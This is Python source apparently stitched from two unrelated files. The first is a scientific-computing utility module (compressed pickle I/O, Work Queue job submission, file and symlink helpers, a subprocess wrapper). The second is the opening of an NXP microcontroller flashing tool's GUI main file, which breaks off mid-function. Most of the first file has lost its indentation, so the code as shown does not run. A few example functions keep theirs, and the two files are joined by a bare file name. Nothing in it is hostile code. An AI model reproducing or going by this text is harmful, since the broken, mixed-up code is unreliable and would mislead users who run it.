# Safeguard against overwriting files? Nah.
# if os.path.exists(fnm):
# logger.error("lp_dump cannot write to an existing path")
# raise IOError
if os.path.islink(fnm):
logger.warn("Trying to write to a symbolic link %s, removing it first\n" % fnm)
os.unlink(fnm)
if HaveGZ:
f = gzip.GzipFile(fnm, 'wb')
elif HaveBZ2:
f = bz2.BZ2File(fnm, 'wb')
else:
f = open(fnm, 'wb')
Pickler(f, protocol).dump(obj)
f.close()
def lp_load(fnm):
""" Read an object from a bzipped file specified by the path. """
if not os.path.exists(fnm):
logger.error("lp_load cannot read from a path that doesn't exist (%s)" % fnm)
raise IOError
def load_uncompress():
logger.warning("Compressed file loader failed, attempting to read as uncompressed file\n")
f = open(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
def load_bz2():
f = bz2.BZ2File(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
def load_gz():
f = gzip.GzipFile(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
if HaveGZ:
try:
answer = load_gz()
except:
if HaveBZ2:
try:
answer = load_bz2()
except:
answer = load_uncompress()
else:
answer = load_uncompress()
elif HaveBZ2:
try:
answer = load_bz2()
except:
answer = load_uncompress()
else:
answer = load_uncompress()
return answer
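# Illustrative sketch (throwaway file name): round-trip an object through
# lp_dump()/lp_load(); whichever of gzip/bz2 is available decides the
# compression used on disk.
def _example_lp_roundtrip():
    data = {'positions': np.arange(6).reshape(2, 3), 'label': 'example'}
    lp_dump(data, 'example.p')
    loaded = lp_load('example.p')
    assert loaded['label'] == 'example'
    os.remove('example.p')
    return loaded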
#==============================#
#| Work Queue stuff |#
#==============================#
try:
import work_queue
except:
pass
#logger.warning("Work Queue library import fail (You can't queue up jobs using Work Queue)\n")
# Global variable corresponding to the Work Queue object
WORK_QUEUE = None
# Global variable containing a mapping from target names to Work Queue task IDs
WQIDS = defaultdict(list)
def getWorkQueue():
global WORK_QUEUE
return WORK_QUEUE
def getWQIds():
global WQIDS
return WQIDS
def createWorkQueue(wq_port, debug=True, name='geomeTRIC'):
global WORK_QUEUE
if debug:
work_queue.set_debug_flag('all')
WORK_QUEUE = work_queue.WorkQueue(port=wq_port, catalog=True, exclusive=False, shutdown=False)
WORK_QUEUE.specify_name(name)
#WORK_QUEUE.specify_keepalive_timeout(8640000)
WORK_QUEUE.specify_keepalive_interval(8640000)
def destroyWorkQueue():
# Convenience function to destroy the Work Queue objects.
global WORK_QUEUE, WQIDS
WORK_QUEUE = None
WQIDS = defaultdict(list)
def queue_up(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
"""
Submit a job to the Work Queue.
@param[in] wq (Work Queue Object)
@param[in] command (string) The command to run on the remote worker.
@param[in] input_files (list of files) A list of locations of the input files.
@param[in] output_files (list of files) A list of locations of the output files.
"""
global WQIDS
task = work_queue.Task(command)
cwd = os.getcwd()
for f in input_files:
lf = os.path.join(cwd,f)
task.specify_input_file(lf,f,cache=False)
for f in output_files:
lf = os.path.join(cwd,f)
task.specify_output_file(lf,f,cache=False)
task.specify_algorithm(work_queue.WORK_QUEUE_SCHEDULE_FCFS)
if tag is None: tag = command
task.specify_tag(tag)
task.print_time = print_time
taskid = wq.submit(task)
if verbose:
logger.info("Submitting command '%s' to the Work Queue, %staskid %i\n" % (command, "tag %s, " % tag if tag != command else "", taskid))
if tgt is not None:
WQIDS[tgt.name].append(taskid)
else:
WQIDS["None"].append(taskid)
def queue_up_src_dest(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
"""
Submit a job to the Work Queue. This function is a bit fancier in that we can explicitly
specify where the input files come from, and where the output files go to.
@param[in] wq (Work Queue Object)
@param[in] command (string) The command to run on the remote worker.
@param[in] input_files (list of 2-tuples) A list of local and
remote locations of the input files.
@param[in] output_files (list of 2-tuples) A list of local and
remote locations of the output files.
"""
global WQIDS
task = work_queue.Task(command)
for f in input_files:
# print f[0], f[1]
task.specify_input_file(f[0],f[1],cache=False)
for f in output_files:
# print f[0], f[1]
task.specify_output_file(f[0],f[1],cache=False)
task.specify_algorithm(work_queue.WORK_QUEUE_SCHEDULE_FCFS)
if tag is None: tag = command
task.specify_tag(tag)
task.print_time = print_time
taskid = wq.submit(task)
if verbose:
logger.info("Submitting command '%s' to the Work Queue, taskid %i\n" % (command, taskid))
if tgt is not None:
WQIDS[tgt.name].append(taskid)
else:
WQIDS["None"].append(taskid)
def wq_wait1(wq, wait_time=10, wait_intvl=1, print_time=60, verbose=False):
""" This function waits ten seconds to see if a task in the Work Queue has finished. """
global WQIDS
if verbose: logger.info('---\n')
if wait_intvl >= wait_time:
wait_time = wait_intvl
numwaits = 1
else:
numwaits = int(wait_time/wait_intvl)
for sec in range(numwaits):
task = wq.wait(wait_intvl)
if task:
exectime = task.cmd_execution_time/1000000
if verbose:
logger.info('A job has finished!\n')
                logger.info('Job name = ' + task.tag + ', command = ' + task.command + '\n')
                logger.info("status = " + str(task.status) + '\n')
                logger.info("return_status = " + str(task.return_status) + '\n')
                logger.info("result = " + str(task.result) + '\n')
                logger.info("host = " + task.hostname + '\n')
                logger.info("execution time = " + str(exectime) + '\n')
                logger.info("total_bytes_transferred = " + str(task.total_bytes_transferred) + '\n')
if task.result != 0:
oldid = task.id
oldhost = task.hostname
tgtname = "None"
for tnm in WQIDS:
if task.id in WQIDS[tnm]:
tgtname = tnm
WQIDS[tnm].remove(task.id)
taskid = wq.submit(task)
logger.warning("Task '%s' (task %i) failed on host %s (%i seconds), resubmitted: taskid %i\n" % (task.tag, oldid, oldhost, exectime, taskid))
WQIDS[tgtname].append(taskid)
else:
if hasattr(task, 'print_time'):
print_time = task.print_time
if exectime > print_time: # Assume that we're only interested in printing jobs that last longer than a minute.
logger.info("Task '%s' (task %i) finished successfully on host %s (%i seconds)\n" % (task.tag, task.id, task.hostname, exectime))
for tnm in WQIDS:
if task.id in WQIDS[tnm]:
WQIDS[tnm].remove(task.id)
del task
if hasattr(wq.stats, 'workers_full'):
# Full workers statistic was added with CCTools 4.0
# But deprecated with CCTools 4.1 (so if they're equal we don't add them.)
nbusy = wq.stats.workers_busy + wq.stats.workers_full
else:
nbusy = wq.stats.workers_busy
Complete = wq.stats.total_tasks_complete
Total = wq.stats.total_tasks_dispatched
if verbose:
logger.info("Workers: %i init, %i ready, %i busy, %i total joined, %i total removed\n" \
% (wq.stats.workers_init, wq.stats.workers_ready, nbusy, wq.stats.total_workers_joined, wq.stats.total_workers_removed))
logger.info("Tasks: %i running, %i waiting, %i total dispatched, %i total complete\n" \
% (wq.stats.tasks_running,wq.stats.tasks_waiting,Total,Complete))
logger.info("Data: %i / %i kb sent/received\n" % (int(wq.stats.total_bytes_sent/1000), int(wq.stats.total_bytes_received/1024)))
else:
logger.info("\r%s : %i/%i workers busy; %i/%i jobs complete\r" %\
(time.ctime(), nbusy, (wq.stats.total_workers_joined - wq.stats.total_workers_removed), Complete, Total))
if time.time() - wq_wait1.t0 > 900:
wq_wait1.t0 = time.time()
logger.info('\n')
wq_wait1.t0 = time.time()
def wq_wait(wq, wait_time=10, wait_intvl=10, print_time=60, verbose=False):
""" This function waits until the work queue is completely empty. """
while not wq.empty():
wq_wait1(wq, wait_time=wait_time, wait_intvl=wait_intvl, print_time=print_time, verbose=verbose)
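# Illustrative sketch of the Work Queue helpers above. This assumes the
# work_queue module imported successfully and that a worker has been attached
# to the chosen port; the port number, command and file name are placeholders.
def _example_work_queue_usage(port=9123):
    createWorkQueue(port, debug=False)
    wq = getWorkQueue()
    queue_up(wq, command="echo hello > hello.txt",
             input_files=[], output_files=["hello.txt"])
    wq_wait(wq)
    destroyWorkQueue()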
#=====================================#
#| File and process management stuff |#
#=====================================#
def click():
""" Stopwatch function for timing. """
ans = time.time() - click.t0
click.t0 = time.time()
return ans
click.t0 = time.time()
# Back up a file.
def bak(path, dest=None):
oldf = path
newf = None
if os.path.exists(path):
dnm, fnm = os.path.split(path)
if dnm == '' : dnm = '.'
base, ext = os.path.splitext(fnm)
if dest is None:
dest = dnm
if not os.path.isdir(dest): os.makedirs(dest)
i = 1
while True:
fnm = "%s_%i%s" % (base,i,ext)
newf = os.path.join(dest, fnm)
if not os.path.exists(newf): break
i += 1
logger.info("Backing up %s -> %s\n" % (oldf, newf))
shutil.move(oldf,newf)
return newf
# Purpose: Given a file name and/or an extension, do one of the following:
# 1) If provided a file name, check the file, crash if not exist and err==True. Return the file name.
# 2) If list is empty but extension is provided, check if one file exists that matches
# the extension. If so, return the file name.
# 3) If list is still empty and err==True, then crash with an error.
def onefile(fnm=None, ext=None, err=False):
if fnm is None and ext is None:
if err:
logger.error("Must provide either filename or extension to onefile()")
raise RuntimeError
else:
return None
if fnm is not None:
if os.path.exists(fnm):
if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
fsrc = os.path.abspath(fnm)
fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
#-----
# If the file path doesn't correspond to the current directory, copy the file over
# If the file exists in the current directory already and it's different, then crash.
#-----
if os.path.exists(fdest):
if not filecmp.cmp(fsrc, fdest):
logger.error("onefile() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)),os.path.abspath(fnm)))
raise RuntimeError
else:
logger.info("\x1b[93monefile() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
else:
logger.info("\x1b[93monefile() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
shutil.copy2(fsrc, fdest)
return os.path.basename(fnm)
elif err==True or ext is None:
logger.error("File specified by %s does not exist!" % fnm)
raise RuntimeError
elif ext is not None:
warn_once("File specified by %s does not exist - will try to autodetect .%s extension" % (fnm, ext))
answer = None
cwd = os.getcwd()
ls = [i for i in os.listdir(cwd) if i.endswith('.%s' % ext)]
if len(ls) != 1:
if err:
logger.error("Cannot find a unique file with extension .%s in %s (%i found; %s)" % (ext, cwd, len(ls), ' '.join(ls)))
raise RuntimeError
else:
warn_once("Cannot find a unique file with extension .%s in %s (%i found; %s)" %
(ext, cwd, len(ls), ' '.join(ls)), warnhash = "Found %i .%s files" % (len(ls), ext))
else:
answer = os.path.basename(ls[0])
warn_once("Autodetected %s in %s" % (answer, cwd), warnhash = "Autodetected %s" % answer)
return answer
# Purpose: Given a file name / file list and/or an extension, do one of the following:
# 1) If provided a file list, check each file in the list
# and crash if any file does not exist. Return the list.
# 2) If provided a file name, check the file and crash if the file
# does not exist. Return a length-one list with the file name.
# 3) If list is empty but extension is provided, check for files that
# match the extension. If so, append them to the list.
# 4) If list is still empty and err==True, then crash with an error.
def listfiles(fnms=None, ext=None, err=False, dnm=None):
answer = []
cwd = os.path.abspath(os.getcwd())
if dnm is not None:
os.chdir(dnm)
if isinstance(fnms, list):
for i in fnms:
if not os.path.exists(i):
logger.error('Specified %s but it does not exist' % i)
raise RuntimeError
answer.append(i)
elif isinstance(fnms, six.string_types):
if not os.path.exists(fnms):
logger.error('Specified %s but it does not exist' % fnms)
raise RuntimeError
answer = [fnms]
elif fnms is not None:
print(fnms)
logger.error('First argument to listfiles must be a list, a string, or None')
raise RuntimeError
if answer == [] and ext is not None:
answer = [os.path.basename(i) for i in os.listdir(os.getcwd()) if i.endswith('.%s' % ext)]
if answer == [] and err:
logger.error('listfiles function failed to come up with a file! (fnms = %s ext = %s)' % (str(fnms), str(ext)))
raise RuntimeError
for ifnm, fnm in enumerate(answer):
if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
fsrc = os.path.abspath(fnm)
fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
#-----
# If the file path doesn't correspond to the current directory, copy the file over
# If the file exists in the current directory already and it's different, then crash.
#-----
if os.path.exists(fdest):
if not filecmp.cmp(fsrc, fdest):
logger.error("onefile() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)),os.path.abspath(fnm)))
raise RuntimeError
else:
logger.info("\x1b[93monefile() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
answer[ifnm] = os.path.basename(fnm)
else:
logger.info("\x1b[93monefile() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
shutil.copy2(fsrc, fdest)
answer[ifnm] = os.path.basename(fnm)
os.chdir(cwd)
return answer
def extract_tar(tarfnm, fnms, force=False):
"""
Extract a list of files from .tar archive with any compression.
The file is extracted to the base folder of the archive.
Parameters
----------
tarfnm :
Name of the archive file.
fnms : str or list
File names to be extracted.
force : bool, optional
If true, then force extraction of file even if they already exist on disk.
"""
# Get path of tar file.
fdir = os.path.abspath(os.path.dirname(tarfnm))
# If all files exist, then return - no need to extract.
if (not force) and all([os.path.exists(os.path.join(fdir, f)) for f in fnms]): return
# If the tar file doesn't exist or isn't valid, do nothing.
if not os.path.exists(tarfnm): return
if not tarfile.is_tarfile(tarfnm): return
# Check type of fnms argument.
if isinstance(fnms, six.string_types): fnms = [fnms]
# Load the tar file.
arch = tarfile.open(tarfnm, 'r')
# Extract only the files we have (to avoid an exception).
all_members = arch.getmembers()
all_names = [f.name for f in all_members]
members = [f for f in all_members if f.name in fnms]
# Extract files to the destination.
arch.extractall(fdir, members=members)
def GoInto(Dir):
if os.path.exists(Dir):
if os.path.isdir(Dir): pass
else:
logger.error("Tried to create directory %s, it exists but isn't a directory\n" % newdir)
raise RuntimeError
else:
os.makedirs(Dir)
os.chdir(Dir)
def allsplit(Dir):
# Split a directory into all directories involved.
s = os.path.split(os.path.normpath(Dir))
if s[1] == '' or s[1] == '.' : return []
return allsplit(s[0]) + [s[1]]
def Leave(Dir):
if os.path.split(os.getcwd())[1] != Dir:
logger.error("Trying to leave directory %s, but we're actually in directory %s (check your code)\n" % (Dir,os.path.split(os.getcwd())[1]))
raise RuntimeError
for i in range(len(allsplit(Dir))):
os.chdir('..')
# Dictionary containing specific error messages for specific missing files or file patterns
specific_lst = [(['mdrun','grompp','trjconv','g_energy','g_traj'], "Make sure to install GROMACS and add it to your path (or set the gmxpath option)"),
(['force.mdin', 'stage.leap'], "This file is needed for setting up AMBER force matching targets"),
(['conf.pdb', 'mono.pdb'], "This file is needed for setting up OpenMM condensed phase property targets"),
(['liquid.xyz', 'liquid.key', 'mono.xyz', 'mono.key'], "This file is needed for setting up OpenMM condensed phase property targets"),
(['dynamic', 'analyze', 'minimize', 'testgrad', 'vibrate', 'optimize', 'polarize', 'superpose'], "Make sure to install TINKER and add it to your path (or set the tinkerpath option)"),
(['runcuda.sh', 'npt.py', 'npt_tinker.py'], "This file belongs in the ForceBalance source directory, not sure why it is missing"),
(['input.xyz'], "This file is needed for TINKER molecular property targets"),
(['.*key$', '.*xyz$'], "I am guessing this file is probably needed by TINKER"),
(['.*gro$', '.*top$', '.*itp$', '.*mdp$', '.*ndx$'], "I am guessing this file is probably needed by GROMACS")
]
# Build a dictionary mapping all of the keys in the above lists to their error messages
specific_dct = dict(list(itertools.chain(*[[(j,i[1]) for j in i[0]] for i in specific_lst])))
def MissingFileInspection(fnm):
fnm = os.path.split(fnm)[1]
answer = ""
for key in specific_dct:
if answer == "":
answer += "\n"
if re.match(key, fnm):
answer += "%s\n" % specific_dct[key]
return answer
def wopen(dest, binary=False):
""" If trying to write to a symbolic link, remove it first. """
if os.path.islink(dest):
logger.warn("Trying to write to a symbolic link %s, removing it first\n" % dest)
os.unlink(dest)
if binary:
return open(dest,'wb')
else:
return open(dest,'w')
def LinkFile(src, dest, nosrcok = False):
if os.path.abspath(src) == os.path.abspath(dest): return
if os.path.exists(src):
# Remove broken link
if os.path.islink(dest) and not os.path.exists(dest):
os.remove(dest)
os.symlink(src, dest)
elif os.path.exists(dest):
if os.path.islink(dest): pass
else:
logger.error("Tried to create symbolic link %s to %s, destination exists but isn't a symbolic link\n" % (src, dest))
raise RuntimeError
else:
os.symlink(src, dest)
else:
if not nosrcok:
logger.error("Tried to create symbolic link %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
raise RuntimeError
def CopyFile(src, dest):
if os.path.exists(src):
if os.path.exists(dest):
if os.path.islink(dest):
logger.error("Tried to copy %s to %s, destination exists but it's a symbolic link\n" % (src, dest))
raise RuntimeError
else:
shutil.copy2(src, dest)
else:
logger.error("Tried to copy %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
raise RuntimeError
def link_dir_contents(abssrcdir, absdestdir):
for fnm in os.listdir(abssrcdir):
srcfnm = os.path.join(abssrcdir, fnm)
destfnm = os.path.join(absdestdir, fnm)
if os.path.islink(destfnm) and not os.path.exists(destfnm):
os.remove(destfnm)
if os.path.isfile(srcfnm) or (os.path.isdir(srcfnm) and fnm == 'IC'):
if not os.path.exists(destfnm):
#print "Linking %s to %s" % (srcfnm, destfnm)
os.symlink(srcfnm, destfnm)
def remove_if_exists(fnm):
""" Remove the file if it exists (doesn't return an error). """
if os.path.exists(fnm):
os.remove(fnm)
def which(fnm):
# Get the location of a file. Works only on UNIX-like file systems.
try:
return os.path.split(os.popen('which %s 2> /dev/null' % fnm).readlines()[0].strip())[0]
except:
return ''
# Thanks to cesarkawakami on #python (IRC freenode) for this code.
class LineChunker(object):
def __init__(self, callback):
self.callback = callback
self.buf = ""
def push(self, data):
# Added by LPW during Py3 compatibility; ran into some trouble decoding strings such as
# "a" with umlaut on top. I guess we can ignore these for now. For some reason,
        # Py2 never required decoding of data, I can simply add it to the string.
# self.buf += data # Old Py2 code...
self.buf += data.decode('utf-8')#errors='ignore')
self.nomnom()
def close(self):
if self.buf:
self.callback(self.buf + "\n")
def nomnom(self):
# Splits buffer by new line or carriage return, and passes
# the splitted results onto processing.
while "\n" in self.buf or "\r" in self.buf:
chunk, sep, self.buf = re.split(r"(\r|\n)", self.buf, maxsplit=1)
self.callback(chunk + sep)
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
self.close()
def _exec(command, print_to_screen = False, outfnm = None, logfnm = None, stdin = "", print_command = True, copy_stdout = True, copy_stderr = False, persist = False, expand_cr=False, print_error=True, rbytes=1, cwd=None, **kwargs):
"""Runs command line using subprocess, optionally returning stdout.
Options:
command (required) = Name of the command you want to execute
outfnm (optional) = Name of the output file name (overwritten if exists)
logfnm (optional) = Name of the log file name (appended if exists)
stdin (optional) = A string to be passed to stdin, as if it were typed (use newline character to mimic Enter key)
print_command = Whether to print the command.
copy_stdout = Copy the stdout stream; can set to False in strange situations
copy_stderr = Copy the stderr stream to the stdout stream; useful for GROMACS which prints out everything to stderr (argh.)
expand_cr = Whether to expand carriage returns into newlines (useful for GROMACS mdrun).
print_error = Whether to print error messages on a crash. Should be true most of the time.
persist = Continue execution even if the command gives a nonzero return code.
rbytes = Number of bytes to read from stdout and stderr streams at a time. GMX requires rbytes = 1 otherwise streams are interleaved. Higher values for speed.
"""
# Dictionary of options to be passed to the Popen object.
cmd_options={'shell':isinstance(command, six.string_types), 'stdin':PIPE, 'stdout':PIPE, 'stderr':PIPE, 'universal_newlines':expand_cr, 'cwd':cwd}
# If the current working directory is provided, the outputs will be written to there as well.
if cwd is not None:
if outfnm is not None:
outfnm = os.path.abspath(os.path.join(cwd, outfnm))
if logfnm is not None:
logfnm = os.path.abspath(os.path.join(cwd, logfnm))
# "write to file" : Function for writing some characters to the log and/or output files.
def wtf(out):
if logfnm is not None:
with open(logfnm,'ab+') as f:
f.write(out.encode('utf-8'))
f.flush()
if outfnm is not None:
with open(outfnm,'wb+' if wtf.first else 'ab+') as f:
f.write(out.encode('utf-8'))
f.flush()
wtf.first = False
wtf.first = True
# Preserve backwards compatibility; sometimes None gets passed to stdin.
if stdin is None: stdin = ""
if print_command:
logger.info("Executing process: \x1b[92m%-50s\x1b[0m%s%s%s%s\n" % (' '.join(command) if type(command) is list else command,
" In: %s" % cwd if cwd is not None else "",
" Output: %s" % outfnm if outfnm is not None else "",
" Append: %s" % logfnm if logfnm is not None else "",
(" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
wtf("Executing process: %s%s\n" % (command, (" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
cmd_options.update(kwargs)
p = subprocess.Popen(command, **cmd_options)
# Write the stdin stream to the process.
p.stdin.write(stdin.encode('ascii'))
p.stdin.close()
#===============================================================#
#| Read the output streams from the process. This is a bit |#
#| complicated because programs like GROMACS tend to print out |#
#| stdout as well as stderr streams, and also carriage returns |#
#| along with newline characters. |#
#===============================================================#
# stdout and stderr streams of the process.
streams = [p.stdout, p.stderr]
# These are functions that take chunks of lines (read) as inputs.
def process_out(read):
if print_to_screen: sys.stdout.write(str(read.encode('utf-8')))
if copy_stdout:
process_out.stdout.append(read)
wtf(read)
process_out.stdout = []
def process_err(read):
if print_to_screen: sys.stderr.write(str(read.encode('utf-8')))
process_err.stderr.append(read)
if copy_stderr:
process_out.stdout.append(read)
wtf(read)
process_err.stderr = []
# This reads the streams one byte at a time, and passes it to the LineChunker
# which splits it by either newline or carriage return.
# If the stream has ended, then it is removed from the list.
with LineChunker(process_out) as out_chunker, LineChunker(process_err) as err_chunker:
while True:
to_read, _, _ = select(streams, [], [])
for fh in to_read:
if fh is p.stdout:
read_nbytes = 0
read = ''.encode('utf-8')
while True:
if read_nbytes == 0:
read += fh.read(rbytes)
read_nbytes += rbytes
else:
read += fh.read(1)
read_nbytes += 1
if read_nbytes > 10+rbytes:
raise RuntimeError("Failed to decode stdout from external process.")
if not read:
streams.remove(p.stdout)
p.stdout.close()
break
else:
try:
out_chunker.push(read)
break
except UnicodeDecodeError:
pass
elif fh is p.stderr:
read_nbytes = 0
read = ''.encode('utf-8')
while True:
if read_nbytes == 0:
read += fh.read(rbytes)
read_nbytes += rbytes
else:
read += fh.read(1)
read_nbytes += 1
if read_nbytes > 10+rbytes:
raise RuntimeError("Failed to decode stderr from external process.")
if not read:
streams.remove(p.stderr)
p.stderr.close()
break
else:
try:
err_chunker.push(read)
break
except UnicodeDecodeError:
pass
else:
raise RuntimeError
if len(streams) == 0: break
p.wait()
process_out.stdout = ''.join(process_out.stdout)
process_err.stderr = ''.join(process_err.stderr)
_exec.returncode = p.returncode
if p.returncode != 0:
if process_err.stderr and print_error:
logger.warning("Received an error message:\n")
logger.warning("\n[====] \x1b[91mError Message\x1b[0m [====]\n")
logger.warning(process_err.stderr)
logger.warning("[====] \x1b[91mEnd o'Message\x1b[0m [====]\n")
if persist:
if print_error:
logger.info("%s gave a return code of %i (it may have crashed) -- carrying on\n" % (command, p.returncode))
else:
# This code (commented out) would not throw an exception, but instead exit with the returncode of the crashed program.
# sys.stderr.write("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n" % (command, p.returncode))
# sys.exit(p.returncode)
logger.error("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n\n" % (command, p.returncode))
raise RuntimeError
# Return the output in the form of a list of lines, so we can loop over it using "for line in output".
Out = process_out.stdout.split('\n')
if Out[-1] == '':
Out = Out[:-1]
return Out
_exec.returncode = None
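# Illustrative sketch (POSIX shell assumed): run a simple command through
# _exec() and collect its stdout as a list of lines.
def _example_exec_usage():
    lines = _exec("echo Hello && echo World", print_command=False)
    # lines -> ['Hello', 'World']
    return lines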
def warn_press_key(warning, timeout=10):
logger.warning(warning + '\n')
if sys.stdin.isatty():
logger.warning("\x1b[1;91mPress Enter or wait %i seconds (I assume no responsibility for what happens after this!)\x1b[0m\n" % timeout)
try:
rlist, wlist, xlist = select([sys.stdin], [], [], timeout)
if rlist:
sys.stdin.readline()
except: pass
def warn_once(warning, warnhash = None):
""" Prints a warning but will only do so once in a given run. """
if warnhash is None:
warnhash = warning
if warnhash in warn_once.already:
return
warn_once.already.add(warnhash)
if type(warning) is str:
logger.info(warning + '\n')
elif type(warning) is list:
for line in warning:
logger.info(line + '\n')
warn_once.already = set()
#=========================================#
#| Development stuff (not commonly used) |#
#=========================================#
def concurrent_map(func, data):
"""
    Similar to the builtin function map(), but spawns a thread for each argument
    and applies `func` concurrently.
Note: unlike map(), we cannot take an iterable argument. `data` should be an
indexable sequence.
"""
N = len(data)
result = [None] * N
# wrapper to dispose the result in the right slot
def task_wrapper(i):
result[i] = func(data[i])
threads = [threading.Thread(target=task_wrapper, args=(i,)) for i in range(N)]
for t in threads:
t.start()
for t in threads:
t.join()
return result
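# Illustrative sketch: apply a slow function to several inputs at once with
# concurrent_map(); results come back in the same order as the inputs.
def _example_concurrent_map():
    def slow_square(x):
        time.sleep(0.1)
        return x * x
    return concurrent_map(slow_square, [1, 2, 3, 4])   # -> [1, 4, 9, 16]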
|
main.py
|
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright 2021 NXP
# All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
import wx
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os
import time
import threading
import inspect
import ctypes
from run import runcore
from ui import uidef
from ui import uilang
g_main_win = None
g_task_detectUsbhid = None
g_task_uartAllInOneAction = [None] * uidef.kMaxMfgBoards
g_task_usbAllInOneAction = [None] * uidef.kMaxMfgBoards
g_task_increaseGauge = None
g_uartAutoDownloadResult_success = [0] * uidef.kMaxMfgBoards
g_uartAutoDownloadResult_total = [0] * uidef.kMaxMfgBoards
g_usbAutoDownloadResult_success = [0] * uidef.kMaxMfgBoards
g_usbAutoDownloadResult_total = [0] * uidef.kMaxMfgBoards
kRetryPingTimes = 5
kBootloaderType_Rom = 0
kBootloaderType_Flashloader = 1
def _async_raise(tid, exctype):
tid = ctypes.c_long(tid)
if not inspect.isclass(exctype):
exctype = type(exctype)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
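# Illustrative sketch (hypothetical helper, not called elsewhere in this file):
# _async_raise() can be used to stop a pending worker thread by injecting
# SystemExit into it via its thread ident.
def _stop_thread_example(thread):
    if thread is not None and thread.is_alive():
        _async_raise(thread.ident, SystemExit)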
class flashMain(runcore.flashRun):
def __init__(self, parent):
runcore.flashRun.__init__(self, parent)
self.lastTime = None
self.isUartAllInOneActionTaskPending = [False] * uidef.kMaxMfgBoards
self.isUsbAllInOneActionTaskPending = [False] * uidef.kMaxMfgBoards
def _startGaugeTimer( self ):
self.lastTime = time.time()
self.initGauge()
def _stopGaugeTimer( self ):
self.deinitGauge()
self.updateCostTime()
def callbackSetMcuDevice( self, event ):
self.setTargetSetupValue()
self.createMcuTarget()
self._setUartUsbPort()
def callbackSetConnectedBoards( self, event ):
self.setMcuBoards()
def callbackSwitchSerialPortIndex( self, event ):
self.setSerialPortIndex()
def _setUartUsbPort( self, deviceIndex=0 ):
usbIdList = self.getUsbid()
retryToDetectUsb = False
self.setPortSetupValue(deviceIndex, self.connectStage[deviceIndex], usbIdList, retryToDetectUsb )
def callbackSetUartPort( self, event ):
self._setUartUsbPort()
def callbackSetUsbhidPort( self, event ):
self._setUartUsbPort()
def callbackSetPortVid( self, event ):
self.updatePortSetupValue()
def callbackSetBaudPid( self, event ):
self.updatePortSetupValue()
def _retryToPingBootloader( self, bootType, deviceIndex=0 ):
pingStatus = False
pingCnt = kRetryPingTimes
while (not pingStatus) and pingCnt > 0:
if bootType == kBootloaderType_Rom:
pingStatus = self.pingRom(deviceIndex)
elif bootType == kBootloaderType_Flashloader:
# This is mainly for RT1170 flashloader, but it is also ok for other RT devices
if self.isUartPortSelected:
time.sleep(3)
if self.usbDevicePath[deviceIndex]['flashloader'] != None:
self.connectToDevice(self.connectStage[deviceIndex], deviceIndex)
pingStatus = self.pingFlashloader(deviceIndex)
else:
pass
if pingStatus:
break
pingCnt = pingCnt - 1
time.sleep(2)
return pingStatus
def _doubleCheckBootModeError( self ):
if (self.mcuSeries == uidef.kMcuSeries_iMXRT10yy) or \
(self.mcuSeries == uidef.kMcuSeries_iMXRT11yy):
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_doubleCheckBmod'][self.languageIndex])
elif (self.mcuSeries == uidef.kMcuSeries_iMXRTxxx):
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_doubleCheckIsp'][self.languageIndex])
elif (self.mcuSeries == uidef.kMcuSeries_LPC):
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_doubleCheckIspBoot'][self.languageIndex])
elif (self.mcuSeries == uidef.kMcuSeries_Kinetis):
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_doubleCheckFopt'][self.languageIndex])
else:
pass
def _connectFailureHandler( self, deviceIndex=0 ):
self.connectStage[deviceIndex] = uidef.kConnectStage_Rom
self.updateConnectStatus('red')
usbIdList = self.getUsbid()
self.setPortSetupValue(deviceIndex, self.connectStage[deviceIndex], usbIdList, False )
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_checkUsbCable'][self.languageIndex])
def _connectStateMachine( self, deviceIndex=0 ):
retryToDetectUsb = False
connectSteps = 0
if (self.mcuSeries == uidef.kMcuSeries_iMXRT10yy) or \
(self.mcuSeries == uidef.kMcuSeries_iMXRT11yy):
connectSteps = 3
if (self.mcuSeries == uidef.kMcuSeries_iMXRTxxx) or \
(self.mcuSeries == uidef.kMcuSeries_LPC) or \
(self.mcuSeries == uidef.kMcuSeries_Kinetis):
connectSteps = 2
else:
pass
isConnectionFailureOnce = False
while connectSteps:
if not self.updatePortSetupValue(deviceIndex, retryToDetectUsb):
self._connectFailureHandler(deviceIndex)
if not isConnectionFailureOnce:
